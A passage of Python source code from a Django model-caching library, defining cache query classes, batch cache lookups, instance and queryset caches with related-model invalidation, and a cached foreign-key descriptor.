keys.append(key)\n if extra_keys is not None:\n keys.extend(extra_keys)\n\n # result_dict is dict of key value pair\n result_dict = yield keys\n\n if not result_dict:\n yield None\n return\n\n if extra_keys and (key_value_dict is not None):\n keys_found = set(result_dict.keys()) & set(extra_keys)\n for key_found in keys_found:\n key_value_dict[key_found] = result_dict[key_found]\n\n if key not in result_dict:\n yield None\n return\n\n value = result_dict[key]\n if isinstance(value, WrappedValue):\n value.value = self.from_cache_value(value.value)\n else:\n value = self.from_cache_value(value)\n yield Some(value)\n\n @abstractmethod\n def get_value_for_params(self, *args, **kwargs):\n \"\"\" The fallback method to return value for given params.\n Mostly implemented to get value from database.\n \"\"\"\n pass\n\n def get_extra_keys(self, *args, **kwargs):\n pass\n\n def get_extra_key_value_dict(self, value, *args, **kwargs):\n pass\n\n def pre_set_process_value(self, value, *args, **kwargs):\n return value\n\n def post_process_value(self, value, *args, **kwargs):\n return value\n\n def _set(self, key, value, key_value_dict=None, stale_data_dict=None,\n force_update=False):\n \"\"\" Sets the given key value in cache.\n\n If key_value_dict is passed sets all key-values\n in this dict to cache too.\n \"\"\"\n if stale_data_dict is None:\n stale_data_dict = {}\n\n value = self.to_cache_value(value)\n value = WrappedValue(value, self.get_dynamic_version(), time.time())\n\n if key_value_dict is None:\n key_value_dict = {}\n key_value_dict[key] = value\n\n for key_, value_ in key_value_dict.items():\n if key_ in stale_data_dict:\n current_value_dict = cache.get_many([key_])\n if key_ in current_value_dict:\n current_value = current_value_dict[key_]\n stale_value = stale_data_dict[key_]\n if (isinstance(current_value, StaleData) and\n current_value.timestamp == stale_value.timestamp):\n cache.set(key_, value_, timeout=self.timeout)\n continue\n if force_update:\n cache.set(key_, value_, timeout=self.timeout)\n else:\n cache.add(key_, value_, timeout=self.timeout)\n\n def get_coroutine(self, *args, **kwargs):\n \"\"\" Yields the value for given params (args and kwargs).\n\n First tries to get it from cache. If not found, gets it from\n fallback method and sets the value to cache.\n \"\"\"\n key = self.get_key(*args, **kwargs)\n\n is_invalidation_dynamic = (\n self.invalidation == InvalidationType.DYNAMIC)\n extra_keys = self.get_extra_keys(*args, **kwargs) or []\n if is_invalidation_dynamic:\n stale_key = self.get_stale_key(key)\n extra_keys.append(stale_key)\n key_value_dict = {}\n\n coroutine = self.get_option_value_from_cache_coroutine(key, extra_keys,\n key_value_dict)\n keys = coroutine.send(None)\n result_dict, stale_data_dict = yield keys\n option_value = coroutine.send(result_dict)\n\n return_cache_value = False\n lock_acquired = False\n force_update = False\n if option_value is not None:\n # cache found in cache\n w_value = option_value.unwrap()\n current_dynamic_version = self.get_dynamic_version()\n if isinstance(w_value, WrappedValue):\n try_acquire_lock = False\n value = w_value.value\n if self.allowtime and (\n (time.time() - w_value.timestamp) < self.allowtime):\n return_cache_value = True\n elif (current_dynamic_version is not None and\n current_dynamic_version != w_value.version):\n if self.invalidation in [\n InvalidationType.OFF,\n InvalidationType.DYNAMIC]:\n try_acquire_lock = True\n else:\n force_update = True\n elif is_invalidation_dynamic:\n is_stale = stale_key in stale_data_dict\n if not is_stale:\n return_cache_value = True\n else:\n try_acquire_lock = True\n elif self.allowtime and (\n self.invalidation == InvalidationType.OFF):\n try_acquire_lock = True\n elif self.allowtime is None:\n return_cache_value = True\n else:\n force_update = True\n if try_acquire_lock:\n lock_acquired = self.try_acquire_write_lock(key)\n if not lock_acquired:\n return_cache_value = True\n else:\n force_update = True\n else:\n value = w_value\n return_cache_value = True\n\n if not return_cache_value:\n # get value using fallback method (e.g. db)\n value = self.get_value_for_params(*args, **kwargs)\n if not isinstance(value, DontCache):\n key_value_dict = self.get_extra_key_value_dict(\n value, *args, **kwargs)\n\n set_value_in_cache = True\n if (option_value is None and key in stale_data_dict and\n (time.time() - stale_data_dict[key].timestamp) < 0.3):\n # cache was just invalidated\n # db may return stale data\n # hence\n set_value_in_cache = False\n\n if StrictVersion(django.get_version()) < StrictVersion('1.7'):\n transaction.commit_unless_managed()\n\n value = self.pre_set_process_value(value, *args, **kwargs)\n\n # set the key value in cache\n if set_value_in_cache:\n self._set(key, value, key_value_dict, stale_data_dict,\n force_update=force_update)\n\n if is_invalidation_dynamic:\n cache.delete(stale_key)\n\n if lock_acquired:\n self.release_write_lock(key)\n\n if isinstance(value, DontCache):\n value = value.inner_val\n\n value = self.post_process_value(\n value, key_value_dict, *args, **kwargs)\n yield value\n\n def resolve_coroutine(self):\n return self.get_coroutine(*self.args, **self.kwargs)\n\n def get(self, *args, **kwargs):\n \"\"\" Returns the yielded vale from get_coroutine method\n \"\"\"\n coroutine = self.get_coroutine(*args, **kwargs)\n keys = coroutine.send(None)\n if flash_settings.DONT_USE_CACHE:\n result_dict, stale_data_dict = {}, {}\n else:\n result_dict, stale_data_dict = cache_get_many(keys)\n value = coroutine.send((result_dict, stale_data_dict))\n return value\n\n def resolve(self):\n return self.get(*self.args, **self.kwargs)\n\n def reset(self, *args, **kwargs):\n \"\"\" Resets the value in cache using fallback method for given params\n \"\"\"\n if flash_settings.DONT_USE_CACHE:\n return\n key = self.get_key(*args, **kwargs)\n value = self.get_value_for_params(*args, **kwargs)\n key_value_dict = self.get_extra_key_value_dict(value, *args, **kwargs)\n value = self.pre_set_process_value(value, *args, **kwargs)\n self._set(key, value, key_value_dict)\n\n def set(self, params, value, pre_set_process=True):\n \"\"\" Sets the given value in cache for given params\n \"\"\"\n if flash_settings.DONT_USE_CACHE:\n return\n key = self.get_key(**params)\n if pre_set_process:\n value = self.pre_set_process_value(value, **params)\n self._set(key, value, force_update=True)\n\n def resolve_async(self):\n from .loader import FlashCacheLoader\n from thread_context.dataloader_context import DataLoadersFactory\n\n loader = DataLoadersFactory.get_loader_for(FlashCacheLoader)\n return loader.load(self)\n\n\nclass BatchCacheQuery(object):\n \"\"\" Class to make multiple cache queries into one\n \"\"\"\n def __init__(self, *args, **queries):\n if args:\n self.queries = args[0]\n else:\n self.queries = queries\n\n def push(self, *args, **kwargs):\n if args:\n self.queries.update(args[0])\n else:\n self.queries.update(kwargs)\n\n def get(self, only_cache=False, none_on_exception=False,\n return_exceptions=False):\n all_cache_keys = set()\n coroutines_dict = {}\n value_dict = {}\n\n for key, cache_query in self.queries.items():\n coroutine = cache_query.resolve_coroutine()\n cache_keys = coroutine.send(None)\n all_cache_keys.update(cache_keys)\n coroutines_dict[key] = (coroutine, cache_keys)\n\n all_cache_keys = list(all_cache_keys)\n all_cache_result, all_stale_data_dict = cache_get_many(all_cache_keys)\n\n for key in coroutines_dict:\n coroutine, cache_keys = coroutines_dict[key]\n result_dict = {}\n stale_data_dict = {}\n\n to_continue = False\n for cache_key in cache_keys:\n if cache_key in all_cache_result:\n result_dict[cache_key] = all_cache_result[cache_key]\n elif only_cache:\n to_continue = True\n break\n elif cache_key in all_stale_data_dict:\n stale_data_dict[cache_key] = all_stale_data_dict[cache_key]\n if to_continue:\n continue\n\n try:\n value = coroutine.send((result_dict, stale_data_dict))\n value_dict[key] = value\n except Exception as e:\n if return_exceptions:\n value_dict[key] = e\n elif none_on_exception:\n value_dict[key] = None\n else:\n raise\n return value_dict\n\n\nclass BaseModelQueryCacheMeta(ABCMeta):\n \"\"\" Meta class for BaseModelQueryCache class.\n\n Deriving it from ABCMeta because BaseModelQueryCache is\n derived from Cache class wich has metaclass ABCMeta\n \"\"\"\n model_caches = defaultdict(list)\n model_caches_on_target_model = defaultdict(list)\n\n def __init__(self, *args, **kwargs):\n \"\"\" self is the class with BaseModelQueryCacheMeta as its\n metaclass\n \"\"\"\n super(BaseModelQueryCacheMeta, self).__init__(*args, **kwargs)\n\n if is_abstract_class(self):\n return\n\n # register self in model_caches dict corressponding to all the models\n # against which cache should get invalidated.\n for model in self.get_invalidation_models():\n self.model_caches[model].append(self)\n\n target_models = self.get_cache_model()\n if target_models:\n if not isinstance(target_models, (list, tuple)):\n # If it's a single model\n target_models = [target_models]\n for target_model in target_models:\n self.model_caches_on_target_model[target_model].append(self)\n\n\nclass BaseModelQueryCache(six.with_metaclass(BaseModelQueryCacheMeta, Cache)):\n \"\"\" Base class for all cache classes which cache some query's result\n on assosiated model.\n \"\"\"\n generic_fields_support = True\n\n def __init__(self, *args, **kwargs):\n if USING_KWARG in kwargs:\n self.using = kwargs.pop(USING_KWARG)\n else:\n self.using = self.get_using()\n super(BaseModelQueryCache, self).__init__(*args, **kwargs)\n\n @abstractproperty\n def model(self):\n pass\n\n def get_cache_model(self):\n return None\n\n @abstractproperty\n def key_fields(self):\n pass\n\n def get_using(self):\n return flash_settings.db_discoverer_func(self.model)\n\n def get_queryset(self):\n return self.model.objects.using(self.using)\n\n @instancemethod\n def get(self, *args, **kwargs):\n if USING_KWARG in kwargs:\n self.using = kwargs.pop(USING_KWARG)\n return super(BaseModelQueryCache, self).get(*args, **kwargs)\n\n @instancemethod\n def set(self, *args, **kwargs):\n return super(BaseModelQueryCache, self).set(*args, **kwargs)\n\n @abstractmethod\n def get_invalidation_models(self):\n pass\n\n @abstractmethod\n def get_keys_to_be_invalidated(self, instance, signal, using):\n pass\n\n def get_field_dict(self, *args, **kwargs):\n \"\"\" Returns the given params as dict of field_name as key\n and given param value as value\n \"\"\"\n field_dict = {}\n args_len = len(args)\n if args:\n # put all values in args in same order as of field_name in\n # key_fields starting.\n for i in range(args_len):\n field_name = self.key_fields[i]\n field_dict[field_name] = args[i]\n if kwargs:\n # iterate over all rest key_fields and take values from kwargs\n for field_name in self.key_fields[args_len:]:\n if field_name in kwargs:\n field_dict[field_name] = kwargs[field_name]\n else:\n # check if field is passed in kwargs as attname of field\n # If field is a related field (E.g. ForeignKey) then its\n # attname is actually postfixed with `_id`.\n # E.g. user field has attname user_id\n field = self.model._meta.get_field(field_name)\n if field.attname in kwargs:\n field_dict[field.attname] = kwargs[field.attname]\n else:\n raise KeyFieldNotPassed(field_name)\n return field_dict\n\n @instancemethod\n def get_key(self, *args, **kwargs):\n cls_name = self.__class__.__name__\n using = kwargs.pop(USING_KWARG, self.using)\n key = '%s__%s__%s' % (self.cache_type, using, cls_name)\n field_dict = self.get_field_dict(*args, **kwargs)\n\n for field_name in self.key_fields:\n if self.generic_fields_support:\n if hasattr(self.model, field_name):\n field_obj = getattr(self.model, field_name)\n GenericForeignKey = importGenericForeignKey()\n if isinstance(field_obj, GenericForeignKey):\n value = field_dict[field_name]\n if isinstance(value, tuple):\n ctype_id, object_id = value\n else:\n from django.contrib.contenttypes.models import ContentType\n ctype_id = ContentType.objects_cache.get_for_model(\n value).id\n object_id = getattr(value, value._meta.pk.attname)\n key += '__%s-%s' % (ctype_id, object_id)\n continue\n\n field = self.model._meta.get_field(field_name)\n\n if field_name in field_dict:\n value = field_dict[field_name]\n else:\n value = field_dict[field.attname]\n if isinstance(value, models.Model):\n # get the pk value on instance\n if field.rel:\n rel_model = field.rel.to\n else:\n # In very rare cases, field.rel is found to be None\n # that I do not know why.\n # fallback method to get rel_model\n rel_model = value.__class__\n value = getattr(value, rel_model._meta.pk.attname)\n \"\"\"\n if isinstance(value, unicode):\n value = value.encode('utf-8')\n \"\"\"\n key += '__%s' % str(value)\n key += '__v%s' % self.version\n key = memcache_key_escape(key)\n return key\n\n\nclass InstanceCacheMeta(BaseModelQueryCacheMeta):\n \"\"\" Meta class for InstanceCache class\n \"\"\"\n instance_cache_classes = defaultdict(list)\n\n def __new__(cls, *args, **kwargs):\n ncls = super(InstanceCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n model = ncls.model\n # store the new class's single instance with its model\n # in instance_cache_classes dict\n cls.instance_cache_classes[model].append(ncls)\n if (six.get_unbound_function(ncls.get_instance) ==\n six.get_unbound_function(InstanceCache.get_instance)):\n # if the get_instance method is not overriden then mark the class\n # as simple\n ncls.is_simple = True\n else:\n ncls.is_simple = False\n # ask the class the class to create assosiated related instance classes\n # if any\n ncls.register_related_caches()\n return ncls\n\n\nclass KeyFieldNotPassed(Exception):\n def __init__(self, field_name):\n msg = 'key field `%s` not given' % field_name\n super(KeyFieldNotPassed, self).__init__(msg)\n\n\nclass SameModelInvalidationCache(object):\n \"\"\" Mixin class to be used with InstanceCache, QuerysetCache classes.\n \"\"\"\n\n def _get_invalidation_models(self):\n return [self.model]\n\n def _get_keys_to_be_invalidated(self, instance, signal, using):\n keys = []\n for params in self.get_invalidation_params_list_(instance, signal):\n keys.append(self.get_key(*params, **{USING_KWARG: using}))\n return keys\n\n def get_invalidation_params_list_(self, instance, signal):\n \"\"\" It's called when an instance gets saved and caches\n have to be invalidated.\n\n Returns the list of params on which keys to be invalidated.\n \"\"\"\n params_list = []\n instances = []\n\n if isinstance(instance, tuple):\n # case when instances of many_to_many through model are added\n # or removed.\n instance, _, model, pk_set = instance\n if len(self.key_fields) == 1:\n if (self.key_fields[0] ==\n instance.__class__._meta.object_name.lower()):\n params = (instance.pk,)\n params_list = [params]\n elif (self.key_fields[0] ==\n model._meta.object_name.lower()):\n for pk in pk_set:\n params_list.append((pk,))\n return params_list\n\n filter_dict = {\n instance.__class__._meta.object_name.lower():\n instance.pk,\n '%s__in' % model._meta.object_name.lower():\n pk_set,\n }\n instances = list(self.model.objects.filter(**filter_dict))\n else:\n instances = [instance]\n\n for instance in instances:\n params = []\n params_pre = []\n instance_state_diff = instance.get_state_diff()\n for field_name in self.key_fields:\n try:\n field = self.model._meta.get_field(field_name)\n params.append(getattr(instance, field.attname))\n if (field.attname in instance_state_diff and\n 'pre' in instance_state_diff[field.attname]):\n params_pre.append(instance_state_diff[\n field.attname]['pre'])\n else:\n params_pre.append(getattr(instance, field.attname))\n except:\n if hasattr(self.model, field_name):\n field_obj = getattr(self.model, field_name)\n GenericForeignKey = importGenericForeignKey()\n if isinstance(field_obj, GenericForeignKey):\n ctype_field_name = field_obj.ct_field\n ctype_field_attname = self.model._meta.get_field(\n ctype_field_name).attname\n object_id_attname = field_obj.fk_field\n params.append((getattr(instance, ctype_field_attname),\n (getattr(instance, object_id_attname))))\n if (object_id_attname in instance_state_diff and\n 'pre' in instance_state_diff[object_id_attname]):\n params_pre.append((\n getattr(instance, ctype_field_attname),\n instance_state_diff[object_id_attname]['pre']))\n else:\n params_pre.append((\n getattr(instance, ctype_field_attname),\n getattr(instance, object_id_attname)))\n continue\n raise\n params_list.append(params)\n if params_pre != params:\n params_list.append(params_pre)\n return params_list\n\n\nclass InstanceCache(six.with_metaclass(InstanceCacheMeta,\n BaseModelQueryCache, SameModelInvalidationCache)):\n \"\"\" This class is used when an instance of a model is cached on\n some fields of same model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 3) select_related: list of related instances (attribute)\n 4) get_instance : custom method to get instance (method)\n \"\"\"\n cache_type = 'InstanceCache'\n\n @abstractproperty\n def key_fields(self):\n pass\n\n @classmethod\n def register_related_caches(cls):\n cls.related_caches = {}\n if not hasattr(cls, 'select_related'):\n return\n for relation in cls.select_related:\n class_name = '%s__%s' % (cls.__name__, relation)\n # Create new RelatedInstanceCache class dynamically\n related_cache_class = type(class_name, (RelatedInstanceCache,), {\n 'model': cls.model,\n 'key_fields': cls.key_fields,\n 'relation': relation,\n 'version': cls.version,\n 'timeout': cls.timeout,\n })\n # And store it's instance in related_caches\n cls.related_caches[relation] = related_cache_class\n\n @instancemethod\n def get_cache_model(self):\n return self.model\n\n @instancemethod\n def get_invalidation_models(self):\n return self._get_invalidation_models()\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return self._get_keys_to_be_invalidated(instance, signal, using)\n\n def get_extra_keys(self, *args, **kwargs):\n \"\"\" Returns the keys from assosiated related cache classes\n for given params.\n \"\"\"\n if not hasattr(self, 'select_related'):\n return\n keys = []\n for relation in self.select_related:\n related_cache = self.related_caches[relation]\n key = related_cache.get_key(*args, **kwargs)\n keys.append(key)\n return keys\n\n def get_instance(self, **filter_dict):\n \"\"\" Returns the instance of model.\n Can be overriden in derived classes.\n \"\"\"\n try:\n return self.get_queryset().get(**filter_dict)\n except self.model.DoesNotExist:\n if self.is_simple:\n # Returning the None so that it gets cached.\n return None\n # If there is some problem with storing\n # DoesNotExist as None in cache, then comment upper return\n # and uncomment below return\n # return DontCache(None)\n raise\n except:\n raise\n\n def remove_fk_instances(self, instance):\n \"\"\" Removes all related instances through fields on instance\n before the instance gets saved in cache\n \"\"\"\n if instance is None:\n return\n\n for prop in flash_properties[instance.__class__]:\n attr = '_%s_cache' % prop\n if hasattr(instance, attr):\n delattr(instance, attr)\n\n for field in instance._meta.fields:\n if field.rel:\n attr = '_%s_cache' % field.name\n if hasattr(instance, attr):\n delattr(instance, attr)\n\n def get_value_for_params(self, *args, **kwargs):\n params = self.get_field_dict(*args, **kwargs)\n instance = self.get_instance(**params)\n return instance\n\n def pre_set_process_value(self, instance, *args, **kwargs):\n instance_clone = copy.copy(instance)\n self.remove_fk_instances(instance_clone)\n return instance_clone\n\n def get_extra_key_value_dict(self, instance, *args, **kwargs):\n \"\"\" Returns the key value dict from relations given in select_related\n for given instance. Used when instance is saved in cache.\n \"\"\"\n if instance is None:\n return\n if self.related_caches:\n key_value_dict = {}\n for relation in self.related_caches:\n related_value = instance\n for field_name in relation.split('__'):\n related_value = getattr(related_value, field_name)\n related_cache = self.related_caches[relation]\n related_key = related_cache.get_key(*args, **kwargs)\n key_value_dict[related_key] = related_value\n return key_value_dict\n\n def post_process_value(self, instance, key_value_dict, *args, **kwargs):\n \"\"\" Patches all related instances got from cache in key_value_dict\n to instance.\n \"\"\"\n if instance is None:\n if self.is_simple:\n cache_model = self.get_cache_model()\n raise cache_model.DoesNotExist(\n \"%s matching query does not exist.\" %\n cache_model._meta.object_name)\n return instance\n if not hasattr(self, 'select_related'):\n return instance\n if key_value_dict is None:\n return instance\n keys = []\n relation_keys = {}\n for relation in self.select_related:\n related_cache = self.related_caches[relation]\n key = related_cache.get_key(*args, **kwargs)\n keys.append(key)\n relation_keys[relation] = key\n\n for relation in self.select_related:\n key = relation_keys[relation]\n if not key in key_value_dict:\n continue\n value = key_value_dict[key]\n last_field_name = None\n related_value = instance\n for field_name in (relation.split('__') + [None]):\n if field_name is None:\n setattr(related_value, last_field_name, value)\n else:\n if last_field_name:\n if not hasattr(related_value, last_field_name):\n break\n related_value = getattr(related_value, last_field_name)\n last_field_name = field_name\n return instance\n\n\nclass RelatedInstanceCacheMeta(InstanceCacheMeta):\n \"\"\" Meta class for RelatedInstanceCache\n \"\"\"\n def __new__(cls, *args, **kwargs):\n ncls = super(RelatedInstanceCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n # store all models encountered in reaching last field of relation\n # in rel_models of new class.\n model = ncls.model\n rel_models = {}\n rel_models_inv = {}\n rel_model = model\n relation_splits = ncls.relation.split('__')\n relation_str = ''\n for field_name in relation_splits:\n rel_model = rel_model._meta.get_field(field_name).rel.to\n if relation_str:\n relation_str += '__%s' % field_name\n else:\n relation_str += field_name\n rel_models[rel_model] = relation_str\n rel_models_inv[relation_str] = rel_model\n ncls.rel_models = rel_models\n ncls.rel_models_inv = rel_models_inv\n return ncls\n\n\nclass RelatedModelInvalidationCache(object):\n \"\"\" Mixin class used in RelatedInstanceCache, RelatedQuerysetCache\n \"\"\"\n def _get_invalidation_models(self):\n return [self.model] + self.rel_models.keys()\n\n def _get_keys_to_be_invalidated(self, instance, signal, using):\n keys = []\n for params in self.get_invalidation_params_list(instance, signal):\n keys.append(self.get_key(*params, **{USING_KWARG: using}))\n return keys\n\n def get_invalidation_params_list(self, instance, signal):\n \"\"\" It's called when an instance gets saved and caches\n have to be invalidated.\n\n Returns the list of params on which keys to be invalidated.\n \"\"\"\n key_params_list = []\n\n key_fields_attname = []\n for field_name in self.key_fields:\n field = self.model._meta.get_field(field_name)\n key_fields_attname.append(field.attname)\n\n if isinstance(instance, self.model):\n # get all values in instance assosiated with\n # key_fields and put in params list.\n field_values = []\n field_values_pre = []\n instance_state_diff = instance.get_state_diff()\n for field_attname in key_fields_attname:\n value = getattr(instance, field_attname)\n field_values.append(value)\n if field_attname in instance_state_diff and (\n 'pre' in instance_state_diff[field_attname]):\n field_values_pre.append(instance_state_diff[field_attname]['pre'])\n else:\n field_values_pre.append(value)\n key_params_list.append(tuple(field_values))\n if field_values_pre != field_values:\n key_params_list.append(tuple(field_values_pre))\n\n for rel_model in self.rel_models:\n if isinstance(instance, rel_model):\n filter_dict = {\n self.rel_models[rel_model]: instance,\n }\n # get list of all values using database\n attname_values_list = self.model.objects.filter(\n **filter_dict).values(*key_fields_attname)\n for value in attname_values_list:\n key_params_list.append(tuple(\n [value[attname] for attname in key_fields_attname]))\n if isinstance(instance, tuple):\n # case when instances of many_to_many through model are added\n # or removed.\n instance, _, model, pk_set = instance\n if len(self.key_fields) == 1:\n if (self.key_fields[0] ==\n instance.__class__._meta.object_name.lower()):\n key_params_list.append((instance.id,))\n elif (self.key_fields[0] ==\n model._meta.object_name.lower()):\n for pk in pk_set:\n key_params_list.append((pk,))\n else:\n filter_dict = {\n instance.__class__._meta.object_name.lower():\n instance.pk,\n '%s__in' % model._meta.object_name.lower():\n pk_set,\n }\n # get list of all values using database\n attname_values_list = self.model.objects.filter(\n **filter_dict).values(*key_fields_attname)\n for value in attname_values_list:\n key_params_list.append(tuple(\n [value[attname] for attname in key_fields_attname]))\n return key_params_list\n\n\n\nclass RelatedInstanceCache(six.with_metaclass(RelatedInstanceCacheMeta,\n InstanceCache, RelatedModelInvalidationCache)):\n \"\"\" This class is used when an instance through a related field is cached on\n some fields of a model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 3) relation: related field_name (* attribute)\n 4) get_instance : custom method to get instance (method)\n \"\"\"\n generic_fields_support = False\n\n cache_type = 'RelatedInstanceCache'\n\n @abstractproperty\n def relation(self):\n pass\n\n @instancemethod\n def get_cache_model(self):\n return self.rel_models_inv[self.relation]\n\n @instancemethod\n def get_invalidation_models(self):\n return RelatedModelInvalidationCache._get_invalidation_models(self)\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return RelatedModelInvalidationCache._get_keys_to_be_invalidated(\n self, instance, signal, using)\n\n def get_instance(self, **filter_dict):\n dep_instance = self.get_queryset().select_related(\n self.relation).get(**filter_dict)\n instance = dep_instance\n for rel_attr in self.relation.split('__'):\n instance = getattr(instance, rel_attr)\n return instance\n\n\nclass QuerysetCacheMeta(BaseModelQueryCacheMeta):\n \"\"\" Meta class of QuerysetCache class\n \"\"\"\n queryset_cache_classes = defaultdict(list)\n\n def __new__(cls, *args, **kwargs):\n ncls = super(QuerysetCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n model = ncls.model\n cls.queryset_cache_classes[model].append(ncls)\n if (six.get_unbound_function(ncls.get_result) ==\n six.get_unbound_function(QuerysetCache.get_result)):\n ncls.is_simple = True\n else:\n ncls.is_simple = False\n return ncls\n\n\nclass QuerysetCache(six.with_metaclass(QuerysetCacheMeta,\n BaseModelQueryCache, SameModelInvalidationCache)):\n \"\"\" This class is used when result of filter queryset or its\n descendent queryset of a model is cached on some fields of same model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 4) get_result : custom method to get result (method)\n \"\"\"\n cache_type = 'QuerysetCache'\n\n caching_model_instances = True\n\n @abstractproperty\n def key_fields(self):\n pass\n\n @instancemethod\n def get_cache_model(self):\n if self.caching_model_instances:\n return self.model\n return None\n\n @instancemethod\n def get_invalidation_models(self):\n return self._get_invalidation_models()\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return self._get_keys_to_be_invalidated(instance, signal, using)\n\n def get_result(self, **params):\n \"\"\" By default returns the filter queryset's result\n \"\"\"\n return list(self.get_queryset().filter(**params))\n\n def get_value_for_params(self, *args, **kwargs):\n params = self.get_field_dict(*args, **kwargs)\n result = self.get_result(**params)\n return result\n\n\nclass RelatedQuerysetCacheMeta(QuerysetCacheMeta):\n \"\"\" Meta class of RelatedQuerysetCache class\n \"\"\"\n def __new__(cls, *args, **kwargs):\n ncls = super(RelatedQuerysetCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n # store all models encountered in reaching last field of relation\n # in rel_models of new class.\n model = ncls.model\n rel_models = {}\n rel_models_inv = {}\n rel_model = model\n relation_splits = ncls.relation.split('__')\n relation_str = ''\n for field_name in relation_splits:\n rel_model = rel_model._meta.get_field(field_name).rel.to\n if relation_str:\n relation_str += '__%s' % field_name\n else:\n relation_str += field_name\n rel_models[rel_model] = relation_str\n rel_models_inv[relation_str] = rel_model\n ncls.rel_models = rel_models\n ncls.rel_models_inv = rel_models_inv\n return ncls\n\n\nclass RelatedQuerysetCache(six.with_metaclass(RelatedQuerysetCacheMeta,\n QuerysetCache, RelatedModelInvalidationCache)):\n \"\"\" This class is used when result of filter queryset or its descendent\n queryet through a related field is cached on some fields of a model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 3) relation: related field_name (* attribute)\n 4) get_result : custom method to get result (method)\n \"\"\"\n generic_fields_support = False\n\n cache_type = 'RelatedQuerysetCache'\n\n @instancemethod\n def get_cache_model(self):\n return self.rel_models_inv[self.relation]\n\n @abstractproperty\n def relation(self):\n pass\n\n @instancemethod\n def get_invalidation_models(self):\n return RelatedModelInvalidationCache._get_invalidation_models(self)\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return RelatedModelInvalidationCache._get_keys_to_be_invalidated(\n self, instance, signal, using)\n\n def get_result(self, **params):\n qset = self.get_queryset().filter(**params).select_related(\n self.relation)\n return list([getattr(i, self.relation) for i in qset])\n\n\nclass QuerysetExistsCache(QuerysetCache):\n \"\"\" QuerysetCache derived class to cache existance of instances\n \"\"\"\n caching_model_instances = False\n\n @abstractproperty\n def key_fields(self):\n pass\n\n def get_result(self, **params):\n return self.get_queryset().filter(**params).exists()\n\n def post_process_value(self, value, *args, **kwargs):\n \"\"\" It's defined cause cache retuned values are integers (0 or 1)\n It converts them to boolean\n \"\"\"\n if value is None:\n return value\n return bool(value)\n\n\nclass CacheManager(six.with_metaclass(ABCMeta, object)):\n \"\"\" Base class for model or non model based cache managers\n \"\"\"\n\n\nclass CachedReverseSingleRelatedObjectDescriptor(\n ReverseSingleRelatedObjectDescriptor):\n def __init__(self, field_with_rel, cache_class):\n super(CachedReverseSingleRelatedObjectDescriptor, self).__init__(\n field_with_rel)\n self.cache_class = cache_class\n\n def __get__(self, instance, instance_type=None):\n if instance is None:\n return self\n try:\n return getattr(instance, self.cache_name)\n except AttributeError:\n val = getattr(instance, self.field.attname)\n if val is None:\n # If NULL is an allowed value, return it.\n if self.field.null:\n return None\n raise self.field.rel.to.DoesNotExist\n rel_obj = self.cache_class.get(val)\n setattr(instance, self.cache_name, rel_obj)\n return rel_obj\n\ndef patch_related_object_descriptor(model, key, cache_class):\n orig_key = '_%s_using_db' % key\n setattr(model, orig_key, getattr(model, key))\n setattr(model, key, CachedReverseSingleRelatedObjectDescriptor(\n model._meta.get_field(key), cache_class))\n\n\nclass ModelCacheManagerMeta(ABCMeta):\n \"\"\" Meta class for ModelCacheManager\n \"\"\"\n model_cache_managers = {}\n model_cached_foreignkeys = defaultdict(list)\n\n def __new__(cls, *args, **kwargs):\n own_attrs = args[2]\n model = own_attrs['model']\n\n if model in cls.model_cache_managers:\n # Commenting assertion due to some module reloading bug\n # assert False, \"More than one ModelCacheManager can't be defined for %s\" % (\n # model,)\n return cls.model_cache_managers[model]\n\n if hasattr(model, 'CacheMeta'):\n cachemeta_attrs = {}\n for key, value in model.CacheMeta.__dict__.items():\n if not key.startswith('_'):\n cachemeta_attrs[key] = value\n\n mergable_keys = [\n 'get_key_fields_list',\n 'filter_key_fields_list',\n 'cached_foreignkeys'\n ]\n\n for key, value in cachemeta_attrs.items():\n if key in mergable_keys:\n if (isinstance(value, (tuple, list)) and\n key in own_attrs and\n [i for i in value if i in own_attrs[key]]):\n assert False, \"`%s` in CacheMeta and %s should not have common values\" % (\n key, args[0])\n own_attrs[key] = cachemeta_attrs[key] + own_attrs.get(key, [])\n elif key in own_attrs:\n assert False, \"`%s` can't be defined in both CacheMeta and %s\" % (\n key, args[0])\n else:\n own_attrs[key] = cachemeta_attrs[key]\n\n ncls = super(ModelCacheManagerMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n model = ncls.model\n ncls_instance = ncls()\n\n # register instance of new ModelCacheManager class\n cls.model_cache_managers[model] = ncls_instance\n\n # register all simple_instance_cache_classes\n # and simple_queryset_cache_classes so that `get` and `filter` methods\n # of model cache manager can decide which cache class to be used\n ncls.instance_cache_classes = []\n ncls.simple_instance_cache_classes = {}\n\n if hasattr(ncls_instance, 'get_key_fields_list'):\n # create instance_cache_classes for assosiated model\n ncls_instance.register_instance_classes()\n\n for instance_cache_class in InstanceCacheMeta.instance_cache_classes[\n model]:\n ncls.instance_cache_classes.append(instance_cache_class)\n if instance_cache_class.is_simple:\n key_fields_sorted = tuple(\n sorted(instance_cache_class.key_fields))\n ncls.simple_instance_cache_classes[\n key_fields_sorted] = instance_cache_class\n\n ncls.queryset_cache_classes = []\n ncls.simple_queryset_cache_classes = {}\n\n if hasattr(ncls_instance, 'filter_key_fields_list'):\n # create queryset_cache_classes for assosiated model\n ncls_instance.register_queryset_classes()\n\n for queryset_cache_class in QuerysetCacheMeta.queryset_cache_classes[\n model]:\n ncls.queryset_cache_classes.append(queryset_cache_class)\n if queryset_cache_class.is_simple:\n key_fields_sorted = tuple(\n sorted(queryset_cache_class.key_fields))\n 